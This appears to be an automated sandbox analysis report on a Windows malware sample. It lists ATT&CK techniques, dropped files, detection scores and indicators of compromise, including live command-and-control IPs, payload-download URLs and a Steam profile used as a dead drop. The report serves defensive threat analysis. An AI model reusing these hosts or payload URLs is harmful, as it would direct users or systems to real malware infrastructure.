Source: Yara match	File source: Process Memory Space: build_2024-07-25_20-56.exe PID: 2260, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C450C40 sqlite3_bind_zeroblob,	10_2_6C450C40
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C450D60 sqlite3_bind_parameter_name,	10_2_6C450D60
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C378EA0 sqlite3_clear_bindings,	10_2_6C378EA0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C450B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	10_2_6C450B40
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C376410 bind,WSAGetLastError,	10_2_6C376410

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Scheduled Task/Job	212 Process Injection	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	Login Hook	32 Software Packing	NTDS	266 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	781 Security Software Discovery	SSH	Keylogging	124 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	251 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	212 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
IRqsWvBBMc.exe	55%	Virustotal		Browse
IRqsWvBBMc.exe	100%	Avira	TR/Crypt.TPM.Gen
IRqsWvBBMc.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\build_2024-07-25_20-56[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\server[1].exe	13%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\build_2024-07-25_20-56[1].exe	37%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1000019001\server.exe	13%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	37%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
steamcommunity.com	0%	Virustotal	Browse
arpdabl.zapto.org	12%	Virustotal	Browse
157.123.68.40.in-addr.arpa	1%	Virustotal	Browse
171.39.242.20.in-addr.arpa	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://www.youtube.com	0%	URL Reputation	safe
http://www.mozilla.com/en-US/blocklist/	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://www.youtube.com/	0%	URL Reputation	safe
https://steamcommunity.com/?subsection=broadcasts	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://5.75.212.60/sqls.dll	100%	Avira URL Cloud	malware
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://player.vimeo.com	0%	Avira URL Cloud	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	0%	URL Reputation	safe
https://5.75.212.60/sqls.dll	12%	Virustotal		Browse
http://185.215.113.16/inc/build_2024-07-25_20-56.exeq	100%	Avira URL Cloud	phishing
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
http://arpdabl.zapto.org/s	0%	Avira URL Cloud	safe
https://player.vimeo.com	0%	Virustotal		Browse
https://vaniloin.fun/Coll%C3%A8ge_Ahuntsic?zejw3gqwmp0vw=R8%2Fu9J%2Bj64IFw9x63%2F9aOpnzREOZKM709PyrbqHMCEioUh%2Blkv89lRN48Nn9a3rmWypKncjDf9lPiVhJRxR02Q%3D%3D	0%	Avira URL Cloud	safe
https://steamcommunity.com/?subsection=broadcasts	0%	Virustotal		Browse
https://store.steampowered.com/subscriber_agreement/	0%	Avira URL Cloud	safe
http://198.46.178.145/7847438767.exenderbird	0%	Avira URL Cloud	safe
https://www.gstatic.cn/recaptcha/	0%	Avira URL Cloud	safe
https://vaniloin.fun/Coll%C3%A8ge_Ahuntsic?zejw3gqwmp0vw=R8%2Fu9J%2Bj64IFw9x63%2F9aOpnzREOZKM709PyrbqHMCEioUh%2Blkv89lRN48Nn9a3rmWypKncjDf9lPiVhJRxR02Q%3D%3D	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://www.valvesoftware.com/legal.htm	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	Avira URL Cloud	safe
https://www.gstatic.cn/recaptcha/	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	Avira URL Cloud	safe
http://185.215.113.16/inc/server.exe9c5867ded	100%	Avira URL Cloud	phishing
https://5.75.212.60/nss3.dllll	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	Virustotal		Browse
http://www.valvesoftware.com/legal.htm	0%	Virustotal		Browse
https://www.google.com	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	Avira URL Cloud	safe
https://www.google.com	0%	Virustotal		Browse
https://store.steampowered.com/subscriber_agreement/	0%	Virustotal		Browse
http://185.215.113.16/inc/server.exe	100%	Avira URL Cloud	phishing
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	Avira URL Cloud	safe
http://185.215.113.16/inc/server.exe	18%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english	0%	Avira URL Cloud	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english	0%	Virustotal		Browse
https://steamcommunity.com/profiles/76561199747278259k	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199747278259/badges	100%	Avira URL Cloud	malware
https://5.75.212.60/msvcp140.dlld	100%	Avira URL Cloud	malware
https://vaniloin.fun/Coll%C3%A8ge_Ahuntsic06	0%	Avira URL Cloud	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english	0%	Virustotal		Browse
http://185.215.113.16/Jo89Ku7d/index.phpft	100%	Avira URL Cloud	phishing
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199747278259/badges	0%	Virustotal		Browse
https://s.ytimg.com;	0%	Avira URL Cloud	safe
http://185.215.113.16/Jo89Ku7d/index.phpnu	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpft	15%	Virustotal		Browse
https://vaniloin.fun/Coll%C3%A8ge_Ahuntsic	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	Virustotal		Browse
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en	0%	Avira URL Cloud	safe
https://steam.tv/	0%	Avira URL Cloud	safe
https://5.75.212.60/(	100%	Avira URL Cloud	malware
https://store.steampowered.com/privac	0%	Avira URL Cloud	safe
http://185.215.113.16/Jo89Ku7d/index.phpUsers	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpncoded	100%	Avira URL Cloud	phishing
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&l=e	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	Avira URL Cloud	safe
https://5.75.212.60/?	100%	Avira URL Cloud	malware
http://185.215.113.16/Jo89Ku7d/index.phpnu	15%	Virustotal		Browse
https://t.me/armad2a	100%	Avira URL Cloud	malware
https://5.75.212.60/4	100%	Avira URL Cloud	malware
http://store.steampowered.com/privacy_agreement/	0%	Avira URL Cloud	safe
http://arpdabl.zapto.org/1/z	0%	Avira URL Cloud	safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
https://store.steampowered.com/points/shop/	0%	Avira URL Cloud	safe
https://5.75.212.60/L	100%	Avira URL Cloud	malware
https://5.75.212.60/softokn3.dllj	100%	Avira URL Cloud	malware
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	Virustotal		Browse
https://sketchfab.com	0%	Avira URL Cloud	safe
https://lv.queniujq.cn	0%	Avira URL Cloud	safe
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	Avira URL Cloud	safe
https://5.75.212.60/E	100%	Avira URL Cloud	malware
http://arpdabl.KFHJJJKKFH	0%	Avira URL Cloud	safe
https://5.75.212.60/Z	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199747278259	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	0%	Avira URL Cloud	safe
https://www.google.com/recaptcha/	0%	Avira URL Cloud	safe
https://checkout.steampowered.com/	0%	Avira URL Cloud	safe
http://arpdabl.zapto.org	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	0%	Avira URL Cloud	safe
https://5.75.212.60art/form-data;	0%	Avira URL Cloud	safe
https://vaniloin.fun/Coll%C3%A8ge_Ahuntsic?zejw3gqwmp0vw=R8%2Fu9J%2Bj64IFw9x63%2F9aOpnzREOZKM709Pyrb	0%	Avira URL Cloud	safe
http://198.46.178.145/7847438767.exe	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
vaniloin.fun	104.21.72.79	true	false		unknown
steamcommunity.com	23.192.247.89	true	true	0%, Virustotal, Browse	unknown
arpdabl.zapto.org	77.91.101.71	true	false	12%, Virustotal, Browse	unknown
157.123.68.40.in-addr.arpa	unknown	unknown	true	1%, Virustotal, Browse	unknown
171.39.242.20.in-addr.arpa	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://5.75.212.60/sqls.dll	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://vaniloin.fun/Coll%C3%A8ge_Ahuntsic?zejw3gqwmp0vw=R8%2Fu9J%2Bj64IFw9x63%2F9aOpnzREOZKM709PyrbqHMCEioUh%2Blkv89lRN48Nn9a3rmWypKncjDf9lPiVhJRxR02Q%3D%3D	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199747278259	true	Avira URL Cloud: malware	unknown
http://198.46.178.145/7847438767.exe	false	Avira URL Cloud: safe	unknown
https://5.75.212.60/softokn3.dll	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	build_2024-07-25_20-56.exe, 0000000A.00000003.2960208392.00000000190A6000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://player.vimeo.com	build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	build_2024-07-25_20-56.exe, 0000000A.00000003.2960208392.00000000190A6000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://steamcommunity.com/?subsection=broadcasts	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://arpdabl.zapto.org/s	build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.00000000025D7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://185.215.113.16/inc/build_2024-07-25_20-56.exeq	axplong.exe, 00000007.00000002.3354999318.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://store.steampowered.com/subscriber_agreement/	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.gstatic.cn/recaptcha/	build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://198.46.178.145/7847438767.exenderbird	build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.valvesoftware.com/legal.htm	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.youtube.com	build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.215.113.16/inc/server.exe9c5867ded	axplong.exe, 00000007.00000002.3354999318.0000000000F70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://5.75.212.60/nss3.dllll	build_2024-07-25_20-56.exe, 0000000A.00000003.3103241873.0000000019029000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.3103162642.0000000019020000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com	build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002583000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.215.113.16/inc/server.exe	axplong.exe, 00000007.00000002.3354999318.0000000000F70000.00000004.00000020.00020000.00000000.sdmp	false	18%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english	build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199747278259k	build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.000000000254F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199747278259/badges	build_2024-07-25_20-56.exe, 0000000A.00000003.2891266536.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2817698334.0000000002576000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2862667067.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2877203720.000000000257D000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, build_2024-07-25_20-56.exe, 0000000A.00000003.2835483458.000000000257D000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.10.dr	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
